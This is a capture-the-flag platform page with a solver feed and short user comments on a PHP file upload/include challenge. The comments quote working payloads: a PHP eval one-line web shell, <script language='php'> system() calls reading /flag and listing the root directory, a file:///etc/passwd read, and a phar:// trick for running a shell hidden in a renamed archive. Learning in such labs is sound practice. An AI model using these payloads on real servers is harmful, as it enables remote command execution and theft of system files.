评分(6)
解题动态
1166 攻破了该题 10分钟前
funk 攻破了该题 7小时前
Tychema 攻破了该题 23小时前
chuxinyy 攻破了该题 1天前
1302074808 攻破了该题 2天前
fljx7180 攻破了该题 2天前
2523822945 攻破了该题 4天前
玄猫 攻破了该题 5天前
anton_小金鱼 攻破了该题 5天前
zuaiyio 攻破了该题 5天前
1325 攻破了该题 5天前
小崔 攻破了该题 5天前
run土 攻破了该题 5天前
cha8e1 攻破了该题 5天前
zdfy005 攻破了该题 6天前
FlyXz 攻破了该题 6天前
buuku 攻破了该题 6天前
LUruan 攻破了该题 6天前
lappland 攻破了该题 7天前
评论
zxmals 4年前
举报
我这运气 file:///etc/passwd
wINFerno 4年前
举报
这题目我使用蚁剑连接不上,就写了<script language="php" >system('ls -al /')</script>查看目录 <script language="php" >system('tac /flag')</script>找到flag
zhou0626 4年前
举报
用蚁剑看了眼发现flag文件被放到了根目录
andrewlong 4年前
举报
/flag ??????
守得云开见月明 4年前
举报
@思南you flag是直接存放在根目录下的
思南you 4年前
举报
这是什么原理大佬
王大发财 4年前
举报
一个一个传的<script language=php>system("cat ../../../flag")</script>
onerm 4年前
举报
猜了一下,直接/flag。。。
陈江川0118 4年前
举报
无非就是换了个写一句话木马方式
yes1yi 4年前
举报
有人把flag删掉了?
a2cai 4年前
举报
不是很懂,试过<?php @eval($_POST['shell'])?>放到jpg里,然后上传后包含它,打开F12发现它其实会echo它?但会对一些字符进行转换啥的,我试的<?php和?>会转换成 _ ,然后 < 和 > 分别转换为<!-- 和-->,就不知道为啥用<script language='php'>@eval($_POST[
yswdlll 4年前
举报
phar能把压缩文件解压读取,即使这个压缩文件的后缀名改了也可以。。所以上传一个getshell的压缩文件,后缀名改成jpg或者其他。。然后通过phar://读取
onerm 4年前
举报
学到了